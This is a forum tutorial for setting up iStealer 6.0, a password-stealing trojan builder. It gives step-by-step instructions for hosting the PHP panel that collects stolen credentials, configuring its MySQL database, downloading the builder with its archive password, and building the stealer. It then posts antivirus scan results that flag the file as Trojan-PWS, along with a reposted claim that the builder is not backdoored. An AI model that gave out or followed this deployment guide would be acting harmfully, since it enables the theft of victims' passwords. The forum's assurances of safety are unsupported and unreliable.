Tutorial IStealer 6.0

STEP 1:
First, we will need to setup the PHP panel. To do that, we need hosting website.

I suggest you this one:
http://www.blackapplehost.com/

Click Register to make new account.

STEP 2:
When you finish with registration, go to UserCP.
Then, you will need to create a new MySQL Database by clicking Create/delete MySQL database.

Now, name your database for example database.
My username is username131, so database name would be database_username131 and password passw0rxz123. Click now, Create Database.

In Assign Priviledges panel, select your database's Username & Database.Table name and check all boxes.

STEP 3:
Now we need to download iStealer and setup the PHP.
to download iStealer 6.0 : http://www.multiupload.com/WK0DX467P3
Password: guardianangel

SS : http://yfrog.com/3mistelar60p

STEP 4:
Now we will need to setup the PHP file. Right click on index and click Open with... and select Notepad or some other text editor.
Now, I will use my username, password & database to show you how to correctly setup that(you can find info's on the top).

SS : http://i45.tinypic.com/vzbyg7.png


And save it.

STEP 5:
Now go back to BlackApple Hosting website and press File Manager and upload index.php & style.css file.

STEP 6:
Open iStealer 6.0 when you finish with uploading the index.php & style.css.

Your URL would be something like this:
http://username.blackapplehost.com/index.php

Mine is:

SS : http://i47.tinypic.com/10wptg8.png

Now click build & that's all. Hope you like it and please leave a comment
---------------------------------------------------------------------------------------
Scan results:
File Info
Report date: 10.2.2010 at 16.32.21 (GMT 1)
File name: iStealer.exe
File size: 905728 bytes
MD5 Hash: 4d8c22253a41bbbbe086e16f57eafca6
SHA1 Hash: A96315F66F0B82A805E835BC2A866FCCD7980176
Detection rate: 7 on 20
Status: INFECTED

Detections

a-squared - Trojan-PWS.Win32.Dybalom!IK
Avira AntiVir - TR/Crypt.ZPACK.Gen
Avast - Win32:Malware-gen
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - Trojan-PWS.Win32.Dybalom
Kaspersky - Trojan-PSW.Win32.Dybalom.bkn
McAfee - Generic.dx!nii trojan
NOD32 - Win32/PSW.Fignotok.B
Panda - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

nothing backdoor in this program
not like what he gossiped
I've talked to gosu and Endonium
Endonium Say : I'm not even going to bother reading all the retarded answers that have been made by everyone.

This is NOT backdoored.

Now, let's address a few points.

First of all : A FULL 3 hours data packet and traffic analysis brought up NOTHING at all. There is NOTHING that goes in and out of the system. I personally tested this and I'm pretty sure I'm actually the one who did it the most fully.

It was done on a three computer network. All of them running wireshark. Now you'll tell me this has anti wireshark functions. It most surely does. But it has these functions for the computer it's being ran from. One of my computer acts as a router for the rest of them and receives the same data traffic as the others. I analyzed everything going in and out of my whole network, nothing pulled through.

That's this adressed. From there, you can already say it's not backdoored.

BUT :
Secondly : The server creator (aka main program) generates 2 files when being launched.
One of them is a .dll file that gets thrown in the system folder. This file is already present in the IS folder, is hidden. A few analysis of this file will teach you that it's often associated with trojan programs. (Wow, NEWS for you ... IS is a virus and a trojan).
This .dll NEVER gets executed, NEVER gets registered. NEVER EVER. A simple tool such as Comodo on Paranoia mode will show you this, and it can't be hidden from the system.

Another file is the Music file. It also gets dumped in the system folder, and will appear in the IS folder. This file also NEVER EVER gets executed in any way. It's not Downloaded from an obscure source as some have pretended, it's generated by the IS program itself. Some say it's a WMP play-list exploit. So, you're going to be dumb enough to click on it ? It's an OLD exploit at best and doesn't work anymore. It doesn't get registered into any registry key for auto launch, it doesn't get registered anywhere for that matter and doesn't get executed.

Number 3 : 3 [file and pathname of the sample #1] 905 728 bytes MD5: 0x4D8C22253A41BBBBE086E16F57EAFCA6
SHA-1: 0xA96315F66F0B82A805E835BC2A866FCCD7980176 This is going to be your server. Use your brains. It has the same MD5 as your main program.

This version released by Gosu is NOT backdoored. There is NO evidence at all supporting that, and if anyone has any doubt, I invite them to do themselves a full network analysis if they have the means for it.

It's 100% Clean. This bullshit needs to stop...!!